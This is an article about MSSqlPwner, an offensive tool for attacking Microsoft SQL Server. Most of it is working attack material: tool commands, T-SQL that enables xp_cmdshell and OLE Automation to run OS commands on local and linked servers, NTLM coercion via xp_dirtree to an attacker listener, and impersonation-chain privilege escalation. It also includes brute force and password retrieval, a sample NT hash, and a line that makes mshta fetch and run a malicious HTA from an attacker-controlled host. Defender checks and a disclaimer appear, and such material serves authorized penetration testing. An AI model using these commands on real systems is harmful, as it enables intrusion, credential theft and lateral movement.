MSSqlPwner - Powerful Tool for MSSQL Server Security Testing

MSSqlPwner is a penetration testing tool for exploiting and assessing the security of Microsoft SQL Server (MSSQL) instances.

Built on the Impacket framework, it authenticates with clear-text passwords, NTLM hashes, or Kerberos tickets, using either Windows (domain) logins or native SQL logins. This guide gives an overview of its features, installation, and usage.

Key Features of MSSqlPwner

  • Command Execution: Run operating-system commands on the server through xp_cmdshell, sp_oacreate (OLE Automation), or a custom CLR assembly.

  • Recursive Enumeration: Automatically enumerate linked servers and impersonation chains (logins the current login can EXECUTE AS) to map potential attack paths across instances.

  • NTLM Relay: Coerce the SQL Server service account into authenticating to a host you control, using procedures such as xp_dirtree, xp_subdirs, and xp_fileexist, so that its NTLM authentication can be captured or relayed.

  • Lateral Movement: Move through linked servers and escalate privileges along discovered impersonation chains.

  • Authentication Methods: Supports Windows credentials, MSSQL credentials, NTLM hashes, and Kerberos tickets.

  • Brute Force: Test username/password, hash, or ticket combinations against a list of hosts.

Installation

MSSqlPwner can be installed directly from its GitHub repository. Choose one of the following methods:

Using pip

pip install 'mssqlpwner@git+https://github.com/ScorpionesLabs/MSSqlPwner.git'

Using pipx (Recommended)

pipx install 'git+https://github.com/ScorpionesLabs/MSSqlPwner.git'

Once installed, the tool is run directly. The example below authenticates to 172.16.2.12 as the local Administrator with an NT hash (the -hashes value follows Impacket's LMHASH:NTHASH form, with the LM half left empty) and drops into interactive mode:

mssqlpwner -hashes ':0CB6948805F797BF2A82807973B89537' 'Administrator'@172.16.2.12 -windows-auth interactive

Usage Examples

Interactive Mode

Run MSSqlPwner interactively for live execution:

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive

Command Execution

Execute commands on the connected server or on a linked server:

# Execute "hostname" on the current server through a custom CLR assembly

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname


# Execute "hostname" on the linked server SRV01 using the default stored-procedure method

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname


# Use sp_oacreate on SRV01 to launch mshta, which fetches and runs an HTA from 192.168.45.250 (an attacker-controlled host)

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
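What these execution methods do at the T-SQL level, as an added example that is not part of the original page or of the MSSqlPwner project. It assumes a sysadmin login on the connected server and a linked server named SRV01 (the name used above) with RPC Out enabled; the output path C:\Windows\Temp\out.txt is an assumption:

```sql
-- Added example, not MSSqlPwner's own code. Assumes a sysadmin login on the
-- connected server and a linked server named SRV01 with "RPC Out" enabled.

-- 1. xp_cmdshell (the classic route). It is disabled by default and is an
--    "advanced option", so both switches must be flipped before the first call.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC master..xp_cmdshell 'hostname';          -- output comes back as a result set

-- 2. sp_oacreate (OLE Automation). Runs a command without touching xp_cmdshell,
--    but WScript.Shell.Run returns nothing, so output has to be written to a
--    file and read back. 'Ole Automation Procedures' is also an advanced option;
--    'show advanced options' was already enabled in step 1.
--    C:\Windows\Temp\out.txt is an assumed path.
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;
DECLARE @shell INT;
EXEC sp_oacreate 'WScript.Shell', @shell OUTPUT;
EXEC sp_oamethod @shell, 'Run', NULL, 'cmd /c hostname > C:\Windows\Temp\out.txt';
EXEC sp_oadestroy @shell;

-- 3. The same commands on a linked server. EXEC ... AT ships the batch to SRV01,
--    where it runs under the login the link maps to (see sys.linked_logins);
--    single quotes inside the shipped batch are doubled. This is what
--    "-link-name SRV01 exec" does for you.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;
       EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT SRV01;
EXEC ('EXEC master..xp_cmdshell ''hostname''') AT SRV01;

-- 4. Defender check: which of these switches are on right now on this instance.
SELECT name, CAST(value_in_use AS INT) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled');
```

Every sp_configure change in steps 1 to 3 is written to the SQL Server error log ("Configuration option 'xp_cmdshell' changed from 0 to 1"), which makes enabling these options a cheap detection point; the query in step 4 is the quick audit for instances where someone already did.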

NTLM Relay Attacks

Make the SQL Server service account authenticate to a host you control, so that its NTLM authentication can be captured (for example with Responder) or relayed (for example with Impacket's ntlmrelayx). The SQL server is the victim; the address given to the module is your listener:

# Trigger an NTLM authentication from the current server to the listener at 192.168.45.250

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250


# Trigger it from the server at the end of a specific chain (chain IDs come from the enumerate output)

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id <CHAIN_ID> ntlm-relay 192.168.45.250
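What the ntlm-relay module triggers on the server side, as an added example that is not the page's or the project's own code. It assumes your listener (Responder or ntlmrelayx.py) is already running on 192.168.45.250 and that a linked server named SRV01 exists; the share name is arbitrary:

```sql
-- Added example, not MSSqlPwner's own code. 192.168.45.250 is the attacker's
-- listener; "share" is an arbitrary name, the host only has to answer on SMB.

-- Each of these makes the SQL Server *service account* open an SMB session to
-- the UNC host and authenticate with NTLM. xp_dirtree and xp_fileexist are
-- executable by the public role by default, so a low-privileged SQL login is
-- enough to trigger the authentication.
EXEC master..xp_dirtree   '\\192.168.45.250\share', 1, 1;
EXEC master..xp_subdirs   '\\192.168.45.250\share';
EXEC master..xp_fileexist '\\192.168.45.250\share\probe.txt';

-- Through a linked server it is the *linked* instance's service account that
-- authenticates, which is how the "-link-name SRV01 ntlm-relay" form reaches a
-- host you cannot talk to directly.
EXEC ('EXEC master..xp_dirtree ''\\192.168.45.250\share'', 1, 1') AT SRV01;

-- Defender check (needs VIEW SERVER STATE): does this instance run as a domain
-- account worth capturing? Virtual or local accounts yield nothing relayable.
SELECT servicename, service_account FROM sys.dm_server_services;
```

The authentication you receive belongs to the service account, not to the login you used: with a Responder-style listener you get a NetNTLMv2 challenge/response to crack offline, with ntlmrelayx you forward it to a host where that account has rights. Relay fails against targets that require SMB signing, and the whole trick is blocked by denying outbound TCP 445 from SQL servers or revoking public's EXECUTE on these procedures.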

Direct Queries

Run SQL queries directly:

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER"

Password Retrieval

Retrieve the stored passwords from the linked server DC01:

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrieve-password

Brute Force

Test credentials against multiple hosts:

# Use tickets, hashes, and passwords for brute force attacks

mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt


# Use only hashes for brute force attacks

mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt

Advanced Functionalities

Chain Exploration

MSSqlPwner can identify impersonation chains (sequences of EXECUTE AS steps and linked-server hops) that lead to higher privileges:

# Enumerate linked servers and impersonation chains

mssqlpwner corp.com/user:lab@192.168.1.65 enumerate


# Select a chain ID from the enumerate output; subsequent commands run at the end of that chain

mssqlpwner corp.com/user:lab@192.168.1.65 set-chain <CHAIN_ID>
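The queries that underlie enumerate and the chains it builds, as an added example that is not the page's or the project's own code. It assumes linked servers named SRV01 and SRV02 and a login named sa that the current login may impersonate; run it as whatever login you have:

```sql
-- Added example, not MSSqlPwner's own code. SRV01, SRV02 and the ability to
-- impersonate 'sa' are assumptions for illustration.

-- 1. Where are we, and do we already own the box?
SELECT @@SERVERNAME AS server_name, SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Server-level impersonation: logins the current login holds IMPERSONATE on
--    (directly or through a role). Each row is a possible EXECUTE AS step.
SELECT name AS impersonable_login
FROM sys.server_principals
WHERE type IN ('S', 'U')                     -- SQL logins and Windows logins
  AND HAS_PERMS_BY_NAME(name, 'LOGIN', 'IMPERSONATE') = 1;

-- 3. Database-level path: a TRUSTWORTHY database owned by a sysadmin lets a
--    db_owner there reach sysadmin by impersonating dbo.
SELECT d.name AS db_name, d.is_trustworthy_on, SUSER_SNAME(d.owner_sid) AS owner
FROM sys.databases d
WHERE d.is_trustworthy_on = 1;

-- 4. Linked servers and the login they map ours to. local_principal_id = 0 is the
--    default mapping for all logins. EXEC ... AT needs rpc_out; OPENQUERY does not.
SELECT s.name, s.data_source, s.is_rpc_out_enabled,
       ll.uses_self_credential, ll.remote_name
FROM sys.servers s
LEFT JOIN sys.linked_logins ll
       ON ll.server_id = s.server_id
      AND (ll.local_principal_id = SUSER_ID() OR ll.local_principal_id = 0)
WHERE s.is_linked = 1;

-- 5. One hop: who are we on SRV01, and is that login sysadmin there?
SELECT * FROM OPENQUERY(SRV01,
  'SELECT @@SERVERNAME AS srv, SYSTEM_USER AS login_name,
          IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');

-- 6. Two hops: nested OPENQUERY; each level doubles the quotes of the level
--    below it. This is the part the tool's recursion automates.
SELECT * FROM OPENQUERY(SRV01, 'SELECT * FROM OPENQUERY(SRV02,
  ''SELECT @@SERVERNAME AS srv, SYSTEM_USER AS login_name,
           IS_SRVROLEMEMBER(''''sysadmin'''') AS is_sysadmin'')');

-- 7. Take an impersonation step found in (2) and confirm the escalation.
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER AS now_running_as, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
REVERT;
```

Read steps 2 to 4 as a defender as well: an IMPERSONATE grant on a sysadmin login, a TRUSTWORTHY database owned by sa, or a linked server whose default mapping lands on a privileged remote login are exactly the edges the tool chains together, and each of them is a one-line fix (REVOKE IMPERSONATE, ALTER DATABASE ... SET TRUSTWORTHY OFF, or sp_addlinkedsrvlogin with a low-privileged remote login).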

Custom Assembly Injection

Load and execute a custom CLR assembly (here SqlInject.dll) on the connected server; combine it with -link-server <name> to load the assembly on a linked server instead:

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth inject-custom-asm SqlInject.dll

Notes on Security and Ethics

MSSqlPwner is intended for use by security professionals in authorized environments only, such as penetration testing engagements or security audits with proper permissions.

Unauthorized use of this tool may violate laws and ethical guidelines.

This guide has covered MSSqlPwner's main capabilities for MSSQL server assessment, lateral movement, and privilege escalation. The source code and full documentation are on GitHub at https://github.com/ScorpionesLabs/MSSqlPwner.